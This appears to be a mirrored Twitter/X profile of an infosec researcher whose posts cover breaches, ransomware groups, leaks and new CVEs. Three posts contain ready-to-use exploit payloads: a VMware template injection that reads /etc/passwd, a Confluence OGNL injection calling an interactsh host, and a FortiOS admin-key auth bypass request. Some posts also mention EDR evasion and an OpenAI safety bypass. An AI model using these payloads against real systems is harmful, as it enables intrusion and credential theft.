Soufiane Profile Banner
Soufiane Profile
Soufiane

@S0ufi4n3

Followers
12,827
Following
203
Media
1,225
Statuses
5,415

A random infosec/science enthusiast guy... This account is personal and only reflects my opinions, not those of my employer..🖕

Joined August 2011
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@S0ufi4n3
Soufiane
2 years
The database leaked from (last year?) Airtel breach is leaked "de-hashed" today, and I'm astonished about this WTF practice: about 18k users (out of 42k) have the exact same password: Airtel @123
Tweet media one
131
410
2K
@S0ufi4n3
Soufiane
2 years
Seriously what the hell is going on !! #Lapsus is claiming attacks on #Nvidia then #Nvidia hit back with a #Ransomware Lapsus claims to have 1TB of data and is leaking all Nvidia employees' passwords and NTLM hashes @Cyberknow20 @SOSIntel @vxunderground @ransomwaremap
Tweet media one
Tweet media two
Tweet media three
Tweet media four
47
332
1K
@S0ufi4n3
Soufiane
6 months
Nice catch !
Tweet media one
7
154
862
@S0ufi4n3
Soufiane
6 months
(CVE-2023-32530) Trend Micro Apex Central 2019 (<= Build 6016) Authenticated RCE Well.. This is an unusual SQLi vector
Tweet media one
9
126
555
@S0ufi4n3
Soufiane
11 months
A TA going by the handle Spyboy is selling an AV/EDR killer that is allegedly capable of killing almost every AV/EDR on the market.
Tweet media one
26
155
520
@S0ufi4n3
Soufiane
4 months
Potentiel shitstorm ahead: CVE-2023-51385: OpenSSH OS command injection vulnerability. Merry Christmas!
7
134
451
@S0ufi4n3
Soufiane
2 years
I've been playing today with Citrix Secure Access windows client and to my surprise it's a webview driven app that holds it's authentication state using.. A Cookie that can be extracted from memory with no special privileges. The cookie can then be used to access the web portal.
Tweet media one
11
110
434
@S0ufi4n3
Soufiane
3 months
New technique to bypassing EDRs with EDR-Preloading. Tldr: blocking EDR from loading it's DLL into a process preventing the deployment of user land hooks.
5
156
429
@S0ufi4n3
Soufiane
2 years
Shit storm ahead: A threat actor is claiming to have "Dell Inc" Code Signing Certificate!
Tweet media one
Tweet media two
13
88
403
@S0ufi4n3
Soufiane
1 year
A Russian 0day broker is rising @signalapp RCE price to 2 million dollars. This 4 times the price Zerodium offers.. 🤔
Tweet media one
Tweet media two
11
91
399
@S0ufi4n3
Soufiane
1 year
AirAsia Group is allegedly hit by Daixin ransomware group 5M UNIQUE Passengers personal data, All employees personal data leaked @ransomwaremap
Tweet media one
Tweet media two
Tweet media three
39
415
389
@S0ufi4n3
Soufiane
1 year
An other dirty safety OpenAI bypass
Tweet media one
Tweet media two
12
40
362
@S0ufi4n3
Soufiane
1 year
POC for CVE-2022-39952 affecting Fortinet FortiNAC Why it's so easy... :/
Tweet media one
9
108
340
@S0ufi4n3
Soufiane
2 years
4TB of proprietary data from 🇮🇱 @Cellebrite (Cellebrite Mobilogy & Cellebrite TFS backup) leaked by anonymous source. Notably, Cellebrite Mobilogy shares code with Cellebrite Universal Forensics Extraction Device or Cellebrite UFED, used by law enforcement agencies.
Tweet media one
Tweet media two
8
144
336
@S0ufi4n3
Soufiane
2 years
Well done h4x0rz you got the attention of 90% of Twitter for two days. The community will indeed have a field day unfollowing all of your accounts... #KasperskyLeakFail :)
Tweet media one
Tweet media two
14
80
317
@S0ufi4n3
Soufiane
2 years
I'll be releasing soon the source code of a #ransomware simulator with the following capabilities: -AES encryption of a given number of files with given extensions -FTP/SMTP exfiltratetion -Shadow copy create/delete + some LOLbs -Ransomenote dropping -Logging
Tweet media one
Tweet media two
Tweet media three
Tweet media four
14
53
314
@S0ufi4n3
Soufiane
2 years
Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique
2
100
308
@S0ufi4n3
Soufiane
2 years
The #Conti leak contains at least one still active SSH access have a look at the content @CoreSecurity :) @SOSIntel @Cyberknow20 #Ransomeware
Tweet media one
Tweet media two
8
72
279
@S0ufi4n3
Soufiane
3 years
@AlinejadMasih @x0rz Incident response be like..
Tweet media one
2
20
261
@S0ufi4n3
Soufiane
1 year
I extracted the bitcoin wallet addresses from the affected ESXi ( 315 indexed by shodan at the moment of pulling them) feel free to PR and add new ones.
Tweet media one
22
94
271
@S0ufi4n3
Soufiane
5 months
Because we all love graphs. Just discovered this open-source visualization application that transforms various data formats, such as JSON, YAML, XML, CSV and more, into interactive graphs.
Tweet media one
3
65
260
@S0ufi4n3
Soufiane
2 years
Here is the code of my #Ransomware simulator: I ended up replacing AES with simple XOR. - Exfiltrating Documents (SMTP and/or FTP) - Creating/Deleting Volume Shadow Copies - Encrypting documents - Dropping a ransomware note to the user's desktop
Tweet media one
2
69
253
@S0ufi4n3
Soufiane
2 years
Some #CobaltStrike commands used by #Conti grabbed from the #ContiLeaks . They once used heavily Mega to exfiltrate data. #ThreatIntelligence #Infosec
Tweet media one
3
72
246
@S0ufi4n3
Soufiane
2 years
An ex Revil/Lockbit/Avaddon affiliate claims that @telegram suffers a 0day leading to a full (remote) account takeover + MFA bypass
Tweet media one
6
79
227
@S0ufi4n3
Soufiane
2 years
#VMware CVE-2022-22954 PoC: catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
4
75
220
@S0ufi4n3
Soufiane
2 months
I made a single JSON file from the iSoon/Anxun leak (that you can grab from here () The very first analysis shows that the two key figures are lengmo and Shutd0wn:
Tweet media one
Tweet media two
4
49
218
@S0ufi4n3
Soufiane
9 months
Quite disturbing to notice that by only "ticking" "Produce a single file" when publishing a .net core assembly, most EDRs stop detecting even very basic msfvenom reverse shells! CS was completely blinded, S1 killed the process once co established.
Tweet media one
Tweet media two
7
45
207
@S0ufi4n3
Soufiane
1 year
Just installed Nmap and ran it... Mind blowing tho.. I'm getting addicted to this shit lol OpenAI is awesome 😁😁
Tweet media one
Tweet media two
9
30
206
@S0ufi4n3
Soufiane
11 months
Win32k Elevation of Privilege Vulnerability - CVE 2023 29336 PoC
1
62
202
@S0ufi4n3
Soufiane
2 years
Ok, the thrill is gone: #raidforums was seized by the #FBI which means that the FBI is into phishing now lol The NS domains were used in previous cases: @Cyberknow20 @SOSIntel @
Tweet media one
Tweet media two
Tweet media three
8
70
185
@S0ufi4n3
Soufiane
2 years
Nobody will ever say this enough: insider threats exist and you are probably not prepared for that.
Tweet media one
6
34
186
@S0ufi4n3
Soufiane
1 year
Hell's gates are officially welcoming you 😂 : Internet Control Message Protocol (ICMP) Remote Code Execution Vulnerability a https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23415
7
38
177
@S0ufi4n3
Soufiane
2 months
Not very opsec friendly for an APT dude 😅
Tweet media one
@NathanPatin
Nathan Patin
2 months
Haibo used his personal email address, shutdown @139 .com, to register i-soon[.]net in 2010
Tweet media one
3
10
45
3
30
171
@S0ufi4n3
Soufiane
2 years
A very early version of a HaveIbeenPwnd like related to #Ransomware leaks and attacks #cyberattacks #threatintel #breach #data #leak
Tweet media one
4
49
168
@S0ufi4n3
Soufiane
2 years
The alleged #Samsung leak by #Lapsus contains almost 190Gb of data.
Tweet media one
Tweet media two
5
55
156
@S0ufi4n3
Soufiane
2 years
Confluence RCE (CVE-2022-26134) Poc: {{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/
0
45
157
@S0ufi4n3
Soufiane
1 month
@vxunderground This dude invented the metaverse 30 years ago.
1
4
147
@S0ufi4n3
Soufiane
2 years
Someone shared a massive data breach in @altice_portugal due to an SQL injection on one of their portal. #CyberSecurity #Data #Breach #Leak #Infosec #threat
Tweet media one
Tweet media two
Tweet media three
13
86
145
@S0ufi4n3
Soufiane
2 years
#Lockbit ransomware group allegedly hit Thales ( @thalesgroup ) *again*
Tweet media one
7
38
135
@S0ufi4n3
Soufiane
2 years
A threat actor is selling what could be the most significant leak of the Shanghai GOV () National Police Database. From the sample, it smells like a poorly protected API...
Tweet media one
Tweet media two
10
51
138
@S0ufi4n3
Soufiane
5 months
PoC exploit for CVE-2023-46214, SVD-2023-1104 Splunk Enterprise versions below 9.0.7 and 9.1.2 RCE
1
57
133
@S0ufi4n3
Soufiane
1 year
The FBI charged BreachForums operator Conor Brian Fitzpatrick aka Pompompurin Peekskill, NY.
Tweet media one
Tweet media two
Tweet media three
2
35
123
@S0ufi4n3
Soufiane
3 years
@Snowden In Morrocco we used to have more "direct" ears: The walls have ears.
7
0
109
@S0ufi4n3
Soufiane
9 months
4 RCE on confluence.. This is too much for a single day
2
35
111
@S0ufi4n3
Soufiane
2 years
[ #Russia ] SKY-FRAUD & FERUM, famous Russian #carding forums closed by Russian authorities. Authorities left an easter egg on the code source saying "WHICH ONE OF YOU IS NEXT?" #cybercrime #takedown #infosec #banking
Tweet media one
Tweet media two
3
45
105
@S0ufi4n3
Soufiane
2 months
The second opsec failure from the APT dudes: the email 576514445 @qq [.]com was used to register an account in Hiapk. Hiapk was breached maybe around 2014, this APT dude used "VBULLETIN" as a password :(
Tweet media one
Tweet media two
2
17
109
@S0ufi4n3
Soufiane
1 year
1/2 Working on a shellcode injector that will download the SC and inject it either in a process or into the running process with capability of decrypting it (aes) if the key is provided. Managed to unhook stuff patch amsi/etw. Windows Defender is bypassed at this stage.
Tweet media one
4
13
108
@S0ufi4n3
Soufiane
2 years
The Montenegro 🇲🇪' gov Open data portal breached via an SQLi.. Can't be more ironic..
Tweet media one
1
23
109
@S0ufi4n3
Soufiane
1 year
The Federal government of the United States allegedly fell victim to the Endurance Ransomware.
Tweet media one
Tweet media two
Tweet media three
5
35
103
@S0ufi4n3
Soufiane
4 years
Je suis effaré par l'absurdité et la cruauté de ce qui s'est passé. Je suis désolé #MonsieurPaty , je suis désolé #ConflansSainteHonorine . Je prends sincèrement part de cette douleur, de ce chagrin et de cette incompréhension. Jamais l'idée va mourir. Repose en paix Mr Paty.
Tweet media one
2
21
98
@S0ufi4n3
Soufiane
1 year
#DistributedDenialofSecrets launched a new public download server with over a 100 leaked dataset. https://data[.] ddosecrets[.] com
Tweet media one
2
31
100
@S0ufi4n3
Soufiane
5 months
IntelBroker is selling access to a scary amount of banks 😳
Tweet media one
6
35
98
@S0ufi4n3
Soufiane
1 year
New infostealer dubbed WhiteSnake supporting Linux and Windows operating systems being advertised on pew pew pew forums
1
36
98
@S0ufi4n3
Soufiane
2 years
#Lockbit #ransomware version 3 is now officially used.
Tweet media one
4
34
98
@S0ufi4n3
Soufiane
2 years
This leak gives some insights on how the coders use Process hollowing, API unhooking, some LOLBins usage, Defender Folder exclusion...
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
40
100
@S0ufi4n3
Soufiane
5 months
Yo @AccentureSecure you need to have a look at this:
Tweet media one
0
12
98
@S0ufi4n3
Soufiane
2 years
Getting Ring0 Using a Macro.. This shit is unreal. Cheers @0xDISREL
3
32
100
@S0ufi4n3
Soufiane
1 year
A Working PoC for CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) is out
2
27
96
@S0ufi4n3
Soufiane
2 years
#Haron #ransomware OPSEC Fail!🤦‍♂️
Tweet media one
Tweet media two
Tweet media three
Tweet media four
6
21
96
@S0ufi4n3
Soufiane
1 year
"Weak Password Requirements" gets a CVE now...
10
19
93
@S0ufi4n3
Soufiane
2 years
The "cyber incident" announced by the German-based independent manufacturer of power semiconductor components SEMIKRON is a ransomware attack held by #LV group. 2Tb of data allegedly stolen. @ransomwaremap @cyber_etc @ValeryMarchive
Tweet media one
Tweet media two
Tweet media three
2
35
93
@S0ufi4n3
Soufiane
2 years
The supposedly #Bitcoin address used by #Lapsus received a total of 3,790.62159317 BTC ($160,262,780.59)... I have to admit that extortion works :) btc wallet hint from @HaboubiAnis
Tweet media one
Tweet media two
14
38
88
@S0ufi4n3
Soufiane
1 year
A threat actor seems specialized in selling GOV emails access of these countries France 🇫🇷, India 🇮🇳, Malaysia 🇲🇾, Nigeria 🇳🇬, Pakistan 🇵🇰 and Vietnam🇻🇳
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
33
90
@S0ufi4n3
Soufiane
1 year
3) Go to russianmarket and download all your credentials and cookies.
Tweet media one
3
8
87
@S0ufi4n3
Soufiane
3 months
Proof of concept for a bug, that allows any user to crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain.
3
25
88
@S0ufi4n3
Soufiane
2 months
I processed the image files from the ISOON/Anxun leak (using Tesseract OCR) the result is probably approximative but you can grab it here …. Now working on translating the stuff locally using facebook/mbart-large-50-many-to-many-mmt, will take some time.
Tweet media one
Tweet media two
1
24
88
@S0ufi4n3
Soufiane
2 months
The front desk of the I-Soon office in Chengdu on Tuesday. Credit: @dakekang /Associated Press
Tweet media one
3
25
88
@S0ufi4n3
Soufiane
3 months
Yet another os command injection.. Seriously Fortinet...How the fck is even possible having this amount of vulnerabilities...
2
26
86
@S0ufi4n3
Soufiane
3 months
The Microsoft security team detected a nation-state attack on our corporate systems on January 12, 2024. Microsoft has identified the threat actor as Midnight Blizzard, the Russian state-sponsored actor also known as Nobelium.
Tweet media one
Tweet media two
4
25
85
@S0ufi4n3
Soufiane
2 years
Zero-Click #PoC Trigger for CVE-2021-1965 ( #Qualcomm #SnapDragon WiFi Driver #RCE )
0
31
85
@S0ufi4n3
Soufiane
2 years
#Lockbit DLS updated too, now they have a fucking bugbounty program 😂 @ValeryMarchive @vxunderground
Tweet media one
Tweet media two
Tweet media three
@S0ufi4n3
Soufiane
2 years
#Lockbit #ransomware version 3 is now officially used.
Tweet media one
4
34
98
7
24
82
@S0ufi4n3
Soufiane
2 years
Looks like for about 12hours #Rostelecom hijacked part of the traffic destinated to #Apple . Source:
Tweet media one
Tweet media two
Tweet media three
2
32
80
@S0ufi4n3
Soufiane
2 years
Visual graph of doxed #TrickBot group members as published by #trickbotleaks High resolution: PS1: Maltego file in the repo. #ThreatIntelligence @JGomes_EU @SOSIntel @modernanalytica @sharimahmad07
Tweet media one
5
34
77
@S0ufi4n3
Soufiane
2 months
Some still alive/live platforms spotted 👀
Tweet media one
Tweet media two
Tweet media three
1
11
77
@S0ufi4n3
Soufiane
2 years
#Lockbit operator accuses a user named Alan Wake,(the sponsor of the new xss contest) , of being the leader of #Conti and the new #BlackBasta #ransomware . There are whispers about Lockbit operator being blocked in xss, and according to him, blocked, he will creates his own forum
Tweet media one
5
28
77
@S0ufi4n3
Soufiane
2 months
Windows is leaking NTLM by design...
@akamai_research
Akamai Security Intelligence Group
2 months
Today’s Theme is vulnerability 👀 Akamai researchers have discovered a vuln in Windows Themes that can trigger an authentication coercion - with almost zero user interaction. User views the file, Explorer sends SMB packets with credentials. Full post:
2
89
211
2
20
78
@S0ufi4n3
Soufiane
4 months
A PoC was dropped for the CVE-2023-32530, one of iOS/MacOS 0days from Operation Triangulation presented on CCC by Kaspersky falks.
0
26
76
@S0ufi4n3
Soufiane
5 months
You're welcome @AccentureSecure !
Tweet media one
@S0ufi4n3
Soufiane
5 months
Yo @AccentureSecure you need to have a look at this:
Tweet media one
0
12
98
8
4
73
@S0ufi4n3
Soufiane
2 years
Someone was doxxing #Lapsus and nobody gave a f*ck :) @SOSIntel
Tweet media one
Tweet media two
Tweet media three
7
17
74
@S0ufi4n3
Soufiane
7 months
China’s Ministry of State Security (MSS) has claimed that the NSA infiltrated servers belonging to Chinese tech company Huawei as far back as 2009. Source :
Tweet media one
3
30
75
@S0ufi4n3
Soufiane
2 years
@dcuthbert @Fortinet 41 lines are way too much PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: Hostname User-Agent: Report Runner Content-Type: application/json Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; Content-Length: 606 { "ssh-public-key1": "key" }
3
15
73
@S0ufi4n3
Soufiane
2 years
#Conti leaks contain some plain text credentials ... We will be seeing some really exciting stuff next few days :D
Tweet media one
5
10
69
@S0ufi4n3
Soufiane
2 years
China Telecom allegedly breached by #AtlasIntelligenceGroup About the group:
Tweet media one
1
26
69
@S0ufi4n3
Soufiane
2 years
LockBit's first bounty of 50,000 dollars was paid for discovering a bug related to encryption in this ransomware
Tweet media one
5
13
67
@S0ufi4n3
Soufiane
2 years
Tweet media one
0
29
65
@S0ufi4n3
Soufiane
1 year
Catho ( a job search portal.) based in Barueri, Brazil. Catho Online Ltda. operates as a subsidiary of Brasil Online Holdings Coperatief U.A. And it suffered a massive data breach impacting 10.7M users. The leak contains name, login, email, password and is being sold for $2k.
Tweet media one
6
32
64
@S0ufi4n3
Soufiane
2 years
After successfully locking Oil India, the #ransomware group trying to impersonate REvil (or maybe REvil ?!) added a new victim to their blog:Visotec Group. I'll be calling them useransom.187201 until an "official" name is given to them. @ValeryMarchive @SOSIntel @ransomwaremap
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
19
65
@S0ufi4n3
Soufiane
2 years
#Entrust vs #Lockbit is a very curious case.. From the chat log timestamps, the negociations started two months ago (29/06) and for some reason, after offering 1M$ (saving time?), Entrust stopped negociating the 13/07. FYI:Tha initial ransom was 8M$ than dropped to 6,8M$.
Tweet media one
6
17
65
@S0ufi4n3
Soufiane
1 year
Tweet media one
2
1
62
@S0ufi4n3
Soufiane
2 years
Holly Sh** #KARAKURT the extortion group linked to #Conti added a whole bunch of victims to their new blog! @ValeryMarchive @SOSIntel @ransomwaremap @cyber_etc
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
24
60
@S0ufi4n3
Soufiane
2 years
Panasonic Canada was hit by #Conti #Ransomware group, and part of the data started to leak. @SOSIntel @Cyberknow20 @ValeryMarchive @ransomwaremap
Tweet media one
2
35
61